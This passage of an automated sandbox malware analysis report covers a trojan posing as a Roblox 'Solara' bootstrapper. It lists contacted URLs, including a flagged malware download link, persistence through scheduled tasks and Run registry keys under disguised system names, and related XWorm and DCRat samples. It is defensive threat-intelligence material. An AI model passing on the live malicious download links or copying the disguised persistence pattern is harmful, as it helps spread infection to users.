http://www.nodejs.org	BootstrapperV1.23.exe, 00000008.00000002.2151604236.0000019000196000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nodejs.org	BootstrapperV1.23.exe, 00000008.00000002.2151604236.0000019000196000.00000004.00000800.00020000.00000000.sdmp	false		high
https://discord.com	KKjubdmzCR.exe, Bootstrapper.exe, 00000001.00000002.1903748427.0000016389291000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000008.00000002.2151604236.0000019000001000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ncs.roblox.com/upload	BootstrapperV1.23.exe, 00000008.00000002.2151604236.0000019000119000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000008.00000002.2151604236.0000019000196000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000008.00000002.2151604236.0000019000170000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.nodejs.org	BootstrapperV1.23.exe, 00000008.00000002.2151604236.0000019000196000.00000004.00000800.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.17.dr	false		high
https://gist.githubusercontent.com/typeshi12/072784a0d3a602ed441a435d04c943b6/raw	KKjubdmzCR.exe, Bootstrapper.exe, 00000001.00000002.1903748427.00000163893A8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://james.newtonking.com/projects/json	BootstrapperV1.23.exe.1.dr	false		high
http://getsolara.dev	Bootstrapper.exe, 00000001.00000002.1903748427.0000016389345000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000008.00000002.2151604236.00000190000B4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://discord.com;http://127.0.0.1:6463/rpc?v=11	KKjubdmzCR.exe, 00000000.00000002.1824505943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Bootstrapper.exe, 00000001.00000000.1808692010.00000163873D2000.00000002.00000001.01000000.00000005.sdmp, BootstrapperV1.23.exe, 00000008.00000000.1902477921.000001907B9B7000.00000002.00000001.01000000.0000000C.sdmp, Bootstrapper.exe.0.dr, BootstrapperV1.23.exe.1.dr	false	Avira URL Cloud: safe	unknown
https://aka.ms/vs/17/release/vc_redist.x64.exe	KKjubdmzCR.exe, KKjubdmzCR.exe, 00000000.00000002.1824505943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Bootstrapper.exe, 00000001.00000000.1808692010.00000163873D2000.00000002.00000001.01000000.00000005.sdmp, BootstrapperV1.23.exe, 00000008.00000000.1902477921.000001907B9B7000.00000002.00000001.01000000.0000000C.sdmp, BootstrapperV1.23.exe, 00000008.00000002.2151604236.0000019000196000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe.0.dr, BootstrapperV1.23.exe.1.dr	false		high
https://gitlab.com/cmd-softworks1/a/-/snippets/4768754/raw/main/endpoint.json	BootstrapperV1.23.exe, 00000008.00000000.1902477921.000001907B9B7000.00000002.00000001.01000000.0000000C.sdmp, BootstrapperV1.23.exe, 00000008.00000002.2151604236.00000190000FE000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe.1.dr	false		high
http://4d38a1ec.solaraweb-alj.pages.dev	Bootstrapper.exe, 00000001.00000002.1903748427.000001638942E000.00000004.00000800.00020000.00000000.sdmp	true	7%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://getsolara.dev	Bootstrapper.exe, 00000001.00000002.1903748427.0000016389327000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000001.00000002.1903748427.00000163893A8000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000001.00000002.1903748427.000001638933A000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000008.00000002.2151604236.00000190000AA000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000008.00000002.2151604236.0000019000097000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000008.00000002.2151604236.00000190000FE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gitlab.com/cmd-softworks1/a/-/snippets/4768756/raw/main/discord.json	BootstrapperV1.23.exe, 00000008.00000000.1902477921.000001907B9B7000.00000002.00000001.01000000.0000000C.sdmp, BootstrapperV1.23.exe, 00000008.00000002.2151604236.0000019000001000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe.1.dr	false		high
https://www.newtonsoft.com/jsonschema	BootstrapperV1.23.exe.1.dr	false		high
https://4d38a1ec.solaraweb-alj.pages.dev	Bootstrapper.exe, 00000001.00000002.1903748427.000001638942E000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://www.nuget.org/packages/Newtonsoft.Json.Bson	KKjubdmzCR.exe, KKjubdmzCR.exe, 00000000.00000002.1824505943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Bootstrapper.exe, 00000001.00000000.1808692010.00000163873D2000.00000002.00000001.01000000.00000005.sdmp, BootstrapperV1.23.exe, 00000008.00000000.1902477921.000001907B9B7000.00000002.00000001.01000000.0000000C.sdmp, Bootstrapper.exe.0.dr, BootstrapperV1.23.exe.1.dr	false		high
https://gist.githubusercontent.com/typeshi12/29ef3a44a19235b08aaf229631c024d8/raw	KKjubdmzCR.exe, KKjubdmzCR.exe, 00000000.00000002.1824505943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Bootstrapper.exe, 00000001.00000002.1903748427.0000016389291000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000001.00000000.1808692010.00000163873D2000.00000002.00000001.01000000.00000005.sdmp, Bootstrapper.exe.0.dr	false		high
http://127.0.0.1:64632R	Bootstrapper.exe, 00000001.00000002.1903748427.000001638938E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nodejs.org	BootstrapperV1.23.exe, 00000008.00000002.2151604236.0000019000196000.00000004.00000800.00020000.00000000.sdmp	false		high
http://127.0.0.1:6463/rpc?v=1	KKjubdmzCR.exe, Bootstrapper.exe, 00000001.00000002.1903748427.0000016389291000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000001.00000002.1903748427.000001638938E000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000008.00000002.2151604236.0000019000001000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Bootstrapper.exe, 00000001.00000002.1903748427.0000016389327000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000008.00000002.2151604236.0000019000097000.00000004.00000800.00020000.00000000.sdmp, componentreviewsavesSession.exe, 00000016.00000002.2128695870.0000000002CD9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://clientsettings.roblox.com	BootstrapperV1.23.exe, 00000008.00000002.2151604236.0000019000196000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi	BootstrapperV1.23.exe, 00000008.00000002.2151604236.0000019000119000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000008.00000002.2151604236.0000019000196000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000008.00000002.2151604236.000001900016C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://pastebin.com/raw/pjseRvyK	KKjubdmzCR.exe, Bootstrapper.exe, 00000001.00000002.1903748427.00000163893A8000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000008.00000000.1902477921.000001907B9B7000.00000002.00000001.01000000.0000000C.sdmp, BootstrapperV1.23.exe, 00000008.00000002.2151604236.00000190000FE000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe.1.dr	false		high
https://clientsettings.roblox.com	BootstrapperV1.23.exe, 00000008.00000002.2151604236.0000019000196000.00000004.00000800.00020000.00000000.sdmp	false		high
http://edge-term4-fra2.roblox.com	BootstrapperV1.23.exe, 00000008.00000002.2151604236.0000019000196000.00000004.00000800.00020000.00000000.sdmp	false		high
https://4d38a1ec.solaraweb-alj.pages.dev/download/static/files/Solara.Dir.zip	BootstrapperV1.23.exe, 00000008.00000002.2151604236.0000019000196000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000008.00000002.2151604236.00000190000D1000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000008.00000002.2151604236.0000019000174000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://gist.githubusercontent.com/typeshi12/072784a0d3a602ed441a435d04c943b6/rawChttps://pastebin.c	KKjubdmzCR.exe, 00000000.00000002.1824505943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Bootstrapper.exe, 00000001.00000000.1808692010.00000163873D2000.00000002.00000001.01000000.00000005.sdmp, Bootstrapper.exe.0.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
128.116.123.3	edge-term4-fra2.roblox.com	United States	22697	ROBLOX-PRODUCTIONUS	false
104.21.93.27	getsolara.dev	United States	13335	CLOUDFLARENETUS	false
172.66.44.59	4d38a1ec.solaraweb-alj.pages.dev	United States	13335	CLOUDFLARENETUS	false
104.20.23.46	nodejs.org	United States	13335	CLOUDFLARENETUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1555554
Start date and time:	2024-11-14 04:51:29 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 51s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	52
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	KKjubdmzCR.exe renamed because original name is a hash value
Original Sample Name:	75077730D0B0CC562F277D943F68E20A.exe
Detection:	MAL
Classification:	mal100.spre.troj.expl.evad.winEXE@60/36@5/5
EGA Information:	Successful, ratio: 42.9%
HCA Information:	Successful, ratio: 65% Number of executed functions: 317 Number of non-executed functions: 90
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, RuntimeBroker.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.22
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, 072486cm.n9shteam.ru, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Bootstrapper.exe, PID 7428 because it is empty
Execution Graph export aborted for target BootstrapperV1.23.exe, PID 7772 because it is empty
Execution Graph export aborted for target componentreviewsavesSession.exe, PID 1148 because it is empty
Execution Graph export aborted for target componentreviewsavesSession.exe, PID 8008 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
03:53:05	Task Scheduler	Run new task: componentreviewsavesSession path: "C:\monitordll\componentreviewsavesSession.exe"
03:53:05	Task Scheduler	Run new task: componentreviewsavesSessionc path: "C:\monitordll\componentreviewsavesSession.exe"
03:53:05	Task Scheduler	Run new task: RuntimeBroker path: "C:\Program Files (x86)\windows defender\en-GB\RuntimeBroker.exe"
03:53:05	Task Scheduler	Run new task: RuntimeBrokerR path: "C:\Program Files (x86)\windows defender\en-GB\RuntimeBroker.exe"
03:53:05	Task Scheduler	Run new task: SIHClient path: "C:\Program Files (x86)\windowspowershell\Configuration\Schema\SIHClient.exe"
03:53:05	Task Scheduler	Run new task: SIHClientS path: "C:\Program Files (x86)\windowspowershell\Configuration\Schema\SIHClient.exe"
03:53:05	Task Scheduler	Run new task: wmnXYZRZEK path: "C:\Users\All Users\WindowsHolographicDevices\SpatialStore\wmnXYZRZEK.exe"
03:53:05	Task Scheduler	Run new task: wmnXYZRZEKw path: "C:\Users\All Users\WindowsHolographicDevices\SpatialStore\wmnXYZRZEK.exe"
03:53:08	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run wmnXYZRZEK "C:\Users\All Users\WindowsHolographicDevices\SpatialStore\wmnXYZRZEK.exe"
03:53:16	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SIHClient "C:\Program Files (x86)\windowspowershell\Configuration\Schema\SIHClient.exe"
03:53:24	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Program Files (x86)\windows defender\en-GB\RuntimeBroker.exe"
03:53:33	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run componentreviewsavesSession "C:\monitordll\componentreviewsavesSession.exe"
03:53:42	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run wmnXYZRZEK "C:\Users\All Users\WindowsHolographicDevices\SpatialStore\wmnXYZRZEK.exe"
03:53:50	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SIHClient "C:\Program Files (x86)\windowspowershell\Configuration\Schema\SIHClient.exe"
03:53:59	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Program Files (x86)\windows defender\en-GB\RuntimeBroker.exe"
03:54:08	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run componentreviewsavesSession "C:\monitordll\componentreviewsavesSession.exe"
03:54:17	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run wmnXYZRZEK "C:\Users\All Users\WindowsHolographicDevices\SpatialStore\wmnXYZRZEK.exe"
03:54:25	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run SIHClient "C:\Program Files (x86)\windowspowershell\Configuration\Schema\SIHClient.exe"
03:54:33	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Program Files (x86)\windows defender\en-GB\RuntimeBroker.exe"
03:54:41	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run componentreviewsavesSession "C:\monitordll\componentreviewsavesSession.exe"
22:52:38	API Interceptor	41x Sleep call for process: Bootstrapper.exe modified
22:52:44	API Interceptor	53x Sleep call for process: BootstrapperV1.23.exe modified
22:53:07	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
128.116.123.3	hKWBNgRd7p.exe	Get hash	malicious	XWorm	Browse
	SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exe	Get hash	malicious	Unknown	Browse
	Roblox Account Manager.exe	Get hash	malicious	Unknown	Browse
	Roblox Account Manager.exe	Get hash	malicious	Unknown	Browse
	SolaraBootstrapper.exe	Get hash	malicious	DCRat, XWorm	Browse
	https://www.roblox.com.zm/login	Get hash	malicious	Unknown	Browse
	RobloxPlayerLauncher.exe	Get hash	malicious	Unknown	Browse
104.21.93.27	AYUGPPBj0x.exe	Get hash	malicious	DCRat	Browse
	SecuriteInfo.com.Variant.MSILHeracles.168781.2591.26227.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Variant.MSILHeracles.168781.2591.26227.exe	Get hash	malicious	Unknown	Browse
	8svMXMXNRn.exe	Get hash	malicious	NoCry, XWorm	Browse
	SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Win64.MalwareX-gen.19388.23445.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exe	Get hash	malicious	Unknown	Browse
172.66.44.59	8svMXMXNRn.exe	Get hash	malicious	NoCry, XWorm	Browse
	SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exe	Get hash	malicious	Unknown	Browse
	http://telegram-naughty17.pages.dev/	Get hash	malicious	HTMLPhisher, Porn Scam	Browse
	SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exe	Get hash	malicious	Unknown	Browse
	https://request-templ-1456456.pages.dev/robots.txt/	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Win64.MalwareX-gen.22026.2513.exe	Get hash	malicious	Unknown	Browse
	https://winalertdefr-error0x22908-alert-virus-detected.pages.dev/	Get hash	malicious	TechSupportScam	Browse
	https://retik-finance-io.pages.dev/IP:	Get hash	malicious	Unknown	Browse
	https://precisionclaim.pages.dev/W08Myr0hotline0JP07/	Get hash	malicious	Unknown	Browse
	https://fc3d7a1e1277251c85fdc26ab79f3d5b89893b43d324eabf5300a29d.pages.dev/	Get hash	malicious	HTMLPhisher	Browse
104.20.23.46	AYUGPPBj0x.exe	Get hash	malicious	DCRat	Browse
	SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe	Get hash	malicious	Blank Grabber	Browse
	oIDX88LpSs.exe	Get hash	malicious	XWorm	Browse
	8svMXMXNRn.exe	Get hash	malicious	NoCry, XWorm	Browse
	SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe	Get hash	malicious	Unknown	Browse
	BootstrapperV1.19.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exe	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.nodejs.org	AYUGPPBj0x.exe	Get hash	malicious	DCRat	Browse	104.20.23.46
	IM3OLcx7li.exe	Get hash	malicious	XWorm	Browse	104.20.22.46
	SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe	Get hash	malicious	Blank Grabber	Browse	104.20.23.46
	cgqdM4IA7C.exe	Get hash	malicious	XWorm	Browse	104.20.22.46
	oIDX88LpSs.exe	Get hash	malicious	XWorm	Browse	104.20.23.46
	hKWBNgRd7p.exe	Get hash	malicious	XWorm	Browse	104.20.22.46
	8svMXMXNRn.exe	Get hash	malicious	NoCry, XWorm	Browse	104.20.23.46
	SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exe	Get hash	malicious	Unknown	Browse	104.20.22.46
	SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exe	Get hash	malicious	Unknown	Browse	104.20.22.46
	SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exe	Get hash	malicious	Unknown	Browse	104.20.23.46
getsolara.dev	AYUGPPBj0x.exe	Get hash	malicious	DCRat	Browse	104.21.93.27
	IM3OLcx7li.exe	Get hash	malicious	XWorm	Browse	172.67.203.125
	SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe	Get hash	malicious	Blank Grabber	Browse	172.67.203.125
	cgqdM4IA7C.exe	Get hash	malicious	XWorm	Browse	172.67.203.125
	oIDX88LpSs.exe	Get hash	malicious	XWorm	Browse	172.67.203.125
	hKWBNgRd7p.exe	Get hash	malicious	XWorm	Browse	172.67.203.125
	SecuriteInfo.com.Variant.MSILHeracles.168781.2591.26227.exe	Get hash	malicious	Unknown	Browse	104.21.93.27
	SecuriteInfo.com.Variant.MSILHeracles.168781.2591.26227.exe	Get hash	malicious	Unknown	Browse	104.21.93.27
	8svMXMXNRn.exe	Get hash	malicious	NoCry, XWorm	Browse	104.21.93.27
	SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exe	Get hash	malicious	Unknown	Browse	104.21.93.27
edge-term4-fra2.roblox.com	SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe	Get hash	malicious	Blank Grabber	Browse	128.116.123.4
	oIDX88LpSs.exe	Get hash	malicious	XWorm	Browse	128.116.123.4
	hKWBNgRd7p.exe	Get hash	malicious	XWorm	Browse	128.116.123.3
	BootstrapperV1.19.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	128.116.123.4
	SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exe	Get hash	malicious	Unknown	Browse	128.116.123.3
	SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exe	Get hash	malicious	Unknown	Browse	128.116.123.3
	SecuriteInfo.com.Win64.MalwareX-gen.22026.2513.exe	Get hash	malicious	Unknown	Browse	128.116.123.4
	Roblox Account Manager.exe	Get hash	malicious	Unknown	Browse	128.116.123.3
	SolaraBootstrapper.exe	Get hash	malicious	DCRat, XWorm	Browse	128.116.123.3
nodejs.org	AYUGPPBj0x.exe	Get hash	malicious	DCRat	Browse	104.20.23.46
	IM3OLcx7li.exe	Get hash	malicious	XWorm	Browse	104.20.22.46
	SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe	Get hash	malicious	Blank Grabber	Browse	104.20.23.46
	cgqdM4IA7C.exe	Get hash	malicious	XWorm	Browse	104.20.22.46
	oIDX88LpSs.exe	Get hash	malicious	XWorm	Browse	104.20.23.46
	hKWBNgRd7p.exe	Get hash	malicious	XWorm	Browse	104.20.22.46
	8svMXMXNRn.exe	Get hash	malicious	NoCry, XWorm	Browse	104.20.23.46
	SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exe	Get hash	malicious	Unknown	Browse	104.20.22.46
	SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exe	Get hash	malicious	Unknown	Browse	104.20.22.46
	SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exe	Get hash	malicious	Unknown	Browse	104.20.23.46

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://storage.googleapis.com/windows_bucket1/turbo/download/TurboVPN_setup.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	#U304a#U898b#U7a4d#U4f9d#U983c#U3001_20241113.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	uu8v4UUzTU.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	uu8v4UUzTU.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	ICBM.exe	Get hash	malicious	Xmrig	Browse	104.26.8.242
	PO NO170300999.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	http://bit.ly/UCEMPL	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://us.services.docusign.net/webforms-ux/v1.0/forms/de9dbdc77cc2367bb50c45c4d2a0b8c4	Get hash	malicious	Unknown	Browse	104.18.86.42
	Hess-INV87796-9_588115125.doc	Get hash	malicious	Unknown	Browse	104.26.9.44
	Hess-INV87796-9_588115125.doc	Get hash	malicious	Unknown	Browse	172.67.69.226
ROBLOX-PRODUCTIONUS	AYUGPPBj0x.exe	Get hash	malicious	DCRat	Browse	128.116.44.3
	IM3OLcx7li.exe	Get hash	malicious	XWorm	Browse	128.116.44.4
	SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe	Get hash	malicious	Blank Grabber	Browse	128.116.123.4
	la.bot.arm.elf	Get hash	malicious	Unknown	Browse	128.116.110.16
	cgqdM4IA7C.exe	Get hash	malicious	XWorm	Browse	128.116.21.4
	oIDX88LpSs.exe	Get hash	malicious	XWorm	Browse	128.116.123.4
	hKWBNgRd7p.exe	Get hash	malicious	XWorm	Browse	128.116.123.3
	8svMXMXNRn.exe	Get hash	malicious	NoCry, XWorm	Browse	128.116.44.3
	https://www.roblox.sc/users/294681399108/profile	Get hash	malicious	Unknown	Browse	128.116.122.3
	SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exe	Get hash	malicious	Unknown	Browse	128.116.44.3
CLOUDFLARENETUS	https://storage.googleapis.com/windows_bucket1/turbo/download/TurboVPN_setup.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	#U304a#U898b#U7a4d#U4f9d#U983c#U3001_20241113.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	uu8v4UUzTU.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	uu8v4UUzTU.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	ICBM.exe	Get hash	malicious	Xmrig	Browse	104.26.8.242
	PO NO170300999.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	http://bit.ly/UCEMPL	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://us.services.docusign.net/webforms-ux/v1.0/forms/de9dbdc77cc2367bb50c45c4d2a0b8c4	Get hash	malicious	Unknown	Browse	104.18.86.42
	Hess-INV87796-9_588115125.doc	Get hash	malicious	Unknown	Browse	104.26.9.44
	Hess-INV87796-9_588115125.doc	Get hash	malicious	Unknown	Browse	172.67.69.226
CLOUDFLARENETUS	https://storage.googleapis.com/windows_bucket1/turbo/download/TurboVPN_setup.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	#U304a#U898b#U7a4d#U4f9d#U983c#U3001_20241113.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	uu8v4UUzTU.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	uu8v4UUzTU.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	ICBM.exe	Get hash	malicious	Xmrig	Browse	104.26.8.242
	PO NO170300999.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	http://bit.ly/UCEMPL	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://us.services.docusign.net/webforms-ux/v1.0/forms/de9dbdc77cc2367bb50c45c4d2a0b8c4	Get hash	malicious	Unknown	Browse	104.18.86.42
	Hess-INV87796-9_588115125.doc	Get hash	malicious	Unknown	Browse	104.26.9.44
	Hess-INV87796-9_588115125.doc	Get hash	malicious	Unknown	Browse	172.67.69.226

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	#U304a#U898b#U7a4d#U4f9d#U983c#U3001_20241113.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	128.116.123.3 104.21.93.27 172.66.44.59 104.20.23.46
	http://u48113141.ct.sendgrid.net/	Get hash	malicious	Unknown	Browse	128.116.123.3 104.21.93.27 172.66.44.59 104.20.23.46
	B78DGDwttv.exe	Get hash	malicious	SilverRat	Browse	128.116.123.3 104.21.93.27 172.66.44.59 104.20.23.46
	YDW0S5K7hi.exe	Get hash	malicious	SilverRat	Browse	128.116.123.3 104.21.93.27 172.66.44.59 104.20.23.46
	cDRgXaadjD.exe	Get hash	malicious	SilverRat	Browse	128.116.123.3 104.21.93.27 172.66.44.59 104.20.23.46
	6GViVt34TK.exe	Get hash	malicious	SilverRat	Browse	128.116.123.3 104.21.93.27 172.66.44.59 104.20.23.46
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	128.116.123.3 104.21.93.27 172.66.44.59 104.20.23.46
	file.exe	Get hash	malicious	LummaC	Browse	128.116.123.3 104.21.93.27 172.66.44.59 104.20.23.46
	Play_VM-Now(Bfassl)CLQD.html	Get hash	malicious	Unknown	Browse	128.116.123.3 104.21.93.27 172.66.44.59 104.20.23.46
	Play_VM-Now(Difioreconstruction)CLQD.html	Get hash	malicious	Unknown	Browse	128.116.123.3 104.21.93.27 172.66.44.59 104.20.23.46

Process:	C:\monitordll\componentreviewsavesSession.exe
File Type:	ASCII text, with very long lines (464), with no line terminators
Category:	dropped
Size (bytes):	464
Entropy (8bit):	5.836155639919129
Encrypted:	false
SSDEEP:	6:B9nsfERxQsucGEfzC5NBlNycdTt2IGs3Axpv74c5UxkmhBhwUy0QzWnXh4k5IPpQ:7AcucGE+ZGs3Gv7R5UxkUh7y+hpWPin
MD5:	8997CB753E0AA9FC804F40D8121E3B61
SHA1:	4EE2EBA9FD2358DD325513DA9F568CDACA228FA7
SHA-256:	8667AA0ECEE29C35333DF59531C766E7357F8437722AA9544D2A650DB352FB4D
SHA-512:	B718A8D1FF0C802E16B0A97F9133FCF88CDD3A21F6293D9AA1F1B5CA63BE2F5D93B9E31E507AED1AD6EF54E77617BE98E0343EA8D8973143CD8E2B07976EE80D
Malicious:	false
